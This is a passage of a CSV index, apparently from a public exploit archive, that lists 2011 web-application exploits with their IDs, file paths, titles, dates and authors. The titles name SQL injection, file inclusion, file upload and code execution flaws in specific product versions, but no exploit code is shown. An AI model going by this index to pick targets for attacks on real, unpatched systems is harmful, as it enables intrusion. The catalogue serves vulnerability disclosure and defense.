Tools",php,webapps, -17203,exploits/php/webapps/17203.txt,"Web2Project 2.3 - SQL Injection",2011-04-22,"AutoSec Tools",php,webapps, -17204,exploits/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps, -17205,exploits/php/webapps/17205.txt,"4Images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps, -17206,exploits/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,php,webapps, -17207,exploits/php/webapps/17207.txt,"WordPress Plugin Ajax Category Dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps, -17211,exploits/php/webapps/17211.txt,"mySeatXT 0.1781 - SQL Injection",2011-04-25,"AutoSec Tools",php,webapps, -17212,exploits/php/webapps/17212.txt,"OrangeHRM 2.6.3 - 'PluginController.php' Local File Inclusion",2011-04-25,"AutoSec Tools",php,webapps, -17213,exploits/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps, -17214,exploits/php/webapps/17214.php,"WordPress Plugin SermonBrowser 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps, -17215,exploits/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps, -17216,exploits/php/webapps/17216.txt,"Quick.CMS 3.0 - Cross-Site Request Forgery",2011-04-26,^Xecuti0N3r,php,webapps, -17218,exploits/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps, -17220,exploits/php/webapps/17220.txt,"eyeos 1.9.0.2 - Persistent Cross-Site Scripting Using Image Files",2011-04-28,"Alberto Ortega",php,webapps, -17221,exploits/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps, -17226,exploits/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps, -17228,exploits/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b - SQL Injection",2011-04-29,Evil-Thinker,asp,webapps, -17231,exploits/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps, -17319,exploits/php/webapps/17319.txt,"Tickets 2.13 - SQL Injection",2011-05-25,"AutoSec Tools",php,webapps, -17235,exploits/php/webapps/17235.html,"Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)",2011-05-02,outlaw.dll,php,webapps, -17236,exploits/php/webapps/17236.txt,"Travel411 - SQL Injection",2011-05-02,Caddy-Dz,php,webapps, -17237,exploits/php/webapps/17237.txt,"Horizon Web Builder - 'fshow.php' SQL Injection",2011-05-03,"Iolo Morganwg",php,webapps, -17238,exploits/php/webapps/17238.html,"Front Accounting 2.3.4 - Cross-Site Request Forgery",2011-05-03,"AutoSec Tools",php,webapps, -17239,exploits/php/webapps/17239.txt,"Time and Expense Management System - Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",php,webapps, -17242,exploits/asp/webapps/17242.txt,"Sothink DHTML Menu - SQL Injection",2011-05-04,Caddy-Dz,asp,webapps, -17248,exploits/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps, -17250,exploits/php/webapps/17250.txt,"phpThumb - 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps, -17251,exploits/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",php,webapps, -17259,exploits/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps, -17264,exploits/php/webapps/17264.txt,"Joomla! Component com_versioning - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps, -17265,exploits/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps, -17267,exploits/php/webapps/17267.txt,"Traidnt UP 2.0 - 'view.php' SQL Injection",2011-05-10,ScOrPiOn,php,webapps, -17276,exploits/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps, -17284,exploits/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps, -17285,exploits/php/webapps/17285.php,"osCommerce 2.3.1 - 'banner_manager.php' Arbitrary File Upload",2011-05-14,"Number 7",php,webapps, -17288,exploits/php/webapps/17288.txt,"Joomla! Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps, -17289,exploits/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps, -17292,exploits/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",php,webapps, -17293,exploits/php/webapps/17293.txt,"MediaInSpot CMS - SQL Injection",2011-05-16,"Iolo Morganwg",php,webapps, -17295,exploits/php/webapps/17295.txt,"Vanilla Forum 2.0.17.9 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps, -17296,exploits/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps, -17297,exploits/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps, -17299,exploits/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps, -17301,exploits/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps, -17303,exploits/php/webapps/17303.txt,"Joomla! Component jDownloads 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps, -17307,exploits/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps, -17308,exploits/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps, -17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps, -17311,exploits/php/webapps/17311.txt,"E-Manage MySchool 7.02 - SQL Injection",2011-05-21,az7rb,php,webapps, -17312,exploits/php/webapps/17312.txt,"Tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps, -17314,exploits/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - 'search.php' SQL Injection",2011-05-23,D4rkB1t,php,webapps, -17316,exploits/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,php,webapps, -17320,exploits/php/webapps/17320.txt,"i-doIT 0.9.9-4 - Local File Inclusion",2011-05-25,"AutoSec Tools",php,webapps, -17321,exploits/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps, -17322,exploits/php/webapps/17322.txt,"eGroupWare 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps, -17324,exploits/php/webapps/17324.rb,"AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)",2011-05-25,Metasploit,php,webapps, -17325,exploits/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 - SQL Injection",2011-05-26,"AutoSec Tools",php,webapps, -17327,exploits/php/webapps/17327.txt,"HB eCommerce - SQL Injection",2011-05-27,takeshix,php,webapps, -17330,exploits/php/webapps/17330.html,"cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script)",2011-05-27,ninjashell,php,webapps, -17335,exploits/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,php,webapps, -17336,exploits/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,php,webapps, -17338,exploits/php/webapps/17338.txt,"Joomla! Component com_jmsfileseller - Local File Inclusion",2011-05-28,Valentin,php,webapps, -17341,exploits/php/webapps/17341.txt,"Joomla! Component com_joomnik - SQL Injection",2011-05-29,SOLVER,php,webapps, -17343,exploits/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps, -17344,exploits/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps, -17346,exploits/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",php,webapps, -17347,exploits/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,php,webapps, -17349,exploits/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Remote Hash Exposed",2011-05-30,Aodrulez,hardware,webapps, -17350,exploits/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,php,webapps, -17360,exploits/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,windows,webapps, -17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps, -17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps, -17376,exploits/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps, -17377,exploits/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps, -17378,exploits/php/webapps/17378.py,"Pacer Edition CMS 2.1 - 'rm' Arbitrary File Deletion",2011-06-10,LiquidWorm,php,webapps, -17379,exploits/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - 'l' Local File Inclusion",2011-06-10,LiquidWorm,php,webapps, -17380,exploits/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps, -17382,exploits/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps, -17388,exploits/windows/webapps/17388.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps, -17389,exploits/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps, -17390,exploits/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps, -17393,exploits/multiple/webapps/17393.txt,"Oracle HTTP Server - Cross-Site Scripting Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps, -17394,exploits/php/webapps/17394.txt,"Joomla! Component Scriptegrator 1.5 - Local File Inclusion",2011-06-13,jdc,php,webapps, -17395,exploits/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps, -17402,exploits/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps, -17403,exploits/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps, -17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",multiple,webapps, -17406,exploits/php/webapps/17406.txt,"Catalog Builder eCommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps, -17408,exploits/php/webapps/17408.txt,"WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)",2011-06-17,Saif,php,webapps, -17410,exploits/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps, -17411,exploits/php/webapps/17411.txt,"Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps, -17412,exploits/php/webapps/17412.txt,"Joomla! Component com_team - SQL Injection",2011-06-19,CoBRa_21,php,webapps, -17413,exploits/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps, -17414,exploits/php/webapps/17414.txt,"Joomla! Component com_calcbuilder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps, -17418,exploits/php/webapps/17418.rb,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps, -17423,exploits/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps, -17426,exploits/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps, -17428,exploits/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps, -17435,exploits/php/webapps/17435.txt,"BrewBlogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps, -17436,exploits/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps, -17437,exploits/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps, -17442,exploits/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps, -17443,exploits/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps, -17444,exploits/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injections",2011-06-23,w0rd,php,webapps, -17445,exploits/php/webapps/17445.txt,"2Point Solutions - 'cmspages.php' SQL Injection",2011-06-23,"Newbie Campuz",php,webapps, -17446,exploits/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,php,webapps, -17452,exploits/php/webapps/17452.txt,"Joomla! Component JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps, -17453,exploits/php/webapps/17453.txt,"WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps, -17457,exploits/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps, -17464,exploits/php/webapps/17464.txt,"Joomla! Component mDigg 2.2.8 - SQL Injection",2011-07-01,"Caddy Dz",php,webapps, -17465,exploits/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps, -17466,exploits/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps, -17472,exploits/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17475,exploits/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17477,exploits/php/webapps/17477.txt,"phpDealerLocator - Multiple SQL Injections",2011-07-03,"Robert Cooper",php,webapps, -17478,exploits/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17479,exploits/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17480,exploits/asp/webapps/17480.txt,"DmxReady Faqs Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17481,exploits/asp/webapps/17481.txt,"DmxReady Bilboard 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17482,exploits/asp/webapps/17482.txt,"DmxReady Document Library Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps, -17483,exploits/php/webapps/17483.txt,"DMXReady Account List Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps, -17484,exploits/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps, -17485,exploits/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,php,webapps, -17487,exploits/php/webapps/17487.php,"WeBid 1.0.2 - 'converter.php' Remote Code Execution",2011-07-04,EgiX,php,webapps, -17493,exploits/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,asp,webapps, -17495,exploits/php/webapps/17495.txt,"BbZL.php - Remote File Inclusion",2011-07-06,"Number 7",php,webapps, -17496,exploits/php/webapps/17496.txt,"Joomla! 1.6.3 - Cross-Site Request Forgery",2011-07-06,"Luis Santana",php,webapps, -17500,exploits/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2/2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps, -17503,exploits/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps, -17508,exploits/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting",2011-07-08,"SecPod Research",php,webapps, -17510,exploits/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps, -17514,exploits/php/webapps/17514.php,"phpMyAdmin 3.x - Swekey Remote Code Injection",2011-07-09,Mango,php,webapps, -17515,exploits/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion",2011-07-09,Or4nG.M4N,php,webapps, -17518,exploits/php/webapps/17518.txt,"Tugux CMS 1.2 - 'pid' Arbitrary File Deletion",2011-07-10,LiquidWorm,php,webapps, -17522,exploits/php/webapps/17522.txt,"Fire Soft Board 2.0.1 - Persistent Cross-Site Scripting (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps, -17523,exploits/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps, -17524,exploits/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps, -17525,exploits/php/webapps/17525.txt,"Joomla! Component com_xmap 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps, -17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",php,webapps, -17529,exploits/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,php,webapps, -17530,exploits/php/webapps/17530.txt,"Joomla! Component com_sobi2 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps, -17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,php,webapps, -17532,exploits/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injections",2011-07-14,LiquidWorm,php,webapps, -17533,exploits/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps, -17553,exploits/php/webapps/17553.txt,"Joomla! Component com_rsappt_pro2 - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps, -17554,exploits/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps, -17551,exploits/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps, -17555,exploits/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection",2011-07-21,fb1h2s,php,webapps, -17556,exploits/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps, -17560,exploits/php/webapps/17560.txt,"Joomla! Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps, -17562,exploits/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,php,webapps, -17574,exploits/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps, -17570,exploits/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps, -17571,exploits/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps, -17572,exploits/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps, -17573,exploits/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps, -17577,exploits/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps, -17579,exploits/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps, -17584,exploits/php/webapps/17584.php,"cFTP 0.1 - 'r80' Arbitrary File Upload",2011-07-29,leviathan,php,webapps, -17586,exploits/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps, -17587,exploits/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps, -17590,exploits/php/webapps/17590.txt,"Digital Scribe 1.5 - register_form()' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps, -17591,exploits/php/webapps/17591.txt,"Joomla! Component obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps, -17592,exploits/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps, -17593,exploits/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps, -17595,exploits/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN & dR.sqL",php,webapps, -17594,exploits/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure (Metasploit)",2011-08-01,Metasploit,jsp,webapps, -17597,exploits/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN & dR.sqL",php,webapps, -17602,exploits/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps, -17603,exploits/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",php,webapps, -17606,exploits/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps, -17613,exploits/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps, -17615,exploits/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,jsp,webapps, -17616,exploits/php/webapps/17616.txt,"WordPress Plugin ProPlayer 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps, -17617,exploits/php/webapps/17617.txt,"WordPress Plugin Social Slider 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps, -17637,exploits/php/webapps/17637.txt,"Simple Machines Forum (SMF) 2.0 - Session Hijacking",2011-08-07,seth,php,webapps, -17627,exploits/php/webapps/17627.txt,"WordPress Plugin UPM Polls 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps, -17628,exploits/php/webapps/17628.txt,"WordPress Plugin Media Library Categories 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps, -17629,exploits/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps, -17630,exploits/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,php,webapps, -17631,exploits/php/webapps/17631.txt,"ATutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps, -17633,exploits/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps, -17639,exploits/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent Cross-Site Scripting",2011-08-08,v0nSch3lling,php,webapps, -17640,exploits/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps, -17644,exploits/php/webapps/17644.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps, -17646,exploits/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,php,webapps, -17653,exploits/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps, -17666,exploits/php/webapps/17666.txt,"Prediction Football 2.51 - Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps, -17660,exploits/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps, -17661,exploits/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps, -17662,exploits/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",php,webapps, -17667,exploits/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps, -17673,exploits/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps, -17674,exploits/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,php,webapps, -17675,exploits/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (1)",2011-08-17,v3n0m,php,webapps, -17677,exploits/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps, -17678,exploits/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps, -17679,exploits/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps, -17680,exploits/php/webapps/17680.txt,"WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps, -17681,exploits/php/webapps/17681.txt,"WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps, -17682,exploits/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Blind SQL Injection",2011-08-17,Penguin,php,webapps, -17683,exploits/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps, -17684,exploits/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps, -17685,exploits/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps, -17686,exploits/php/webapps/17686.txt,"WordPress Plugin Ajax Gallery 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps, -17687,exploits/php/webapps/17687.txt,"WordPress Plugin Global Content Blocks 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps, -17688,exploits/php/webapps/17688.txt,"WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps, -17689,exploits/php/webapps/17689.txt,"WordPress Plugin Menu Creator 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps, -17695,exploits/php/webapps/17695.txt,"PHPMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps, -17694,exploits/php/webapps/17694.txt,"network tracker .95 - Persistent Cross-Site Scripting",2011-08-19,G13,php,webapps, -17698,exploits/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection (Metasploit)",2011-08-19,Metasploit,php,webapps, -17702,exploits/php/webapps/17702.rb,"WordPress Plugin Block-Spam-By-Math-Reloaded - Bypass",2011-08-20,"Tiago Ferreira & Heyder Andrade",php,webapps, -17703,exploits/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",php,webapps, -17704,exploits/php/webapps/17704.txt,"WordPress Plugin UnGallery 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps, -17705,exploits/php/webapps/17705.txt,"EasySiteEdit - Remote File Inclusion",2011-08-21,"koskesh 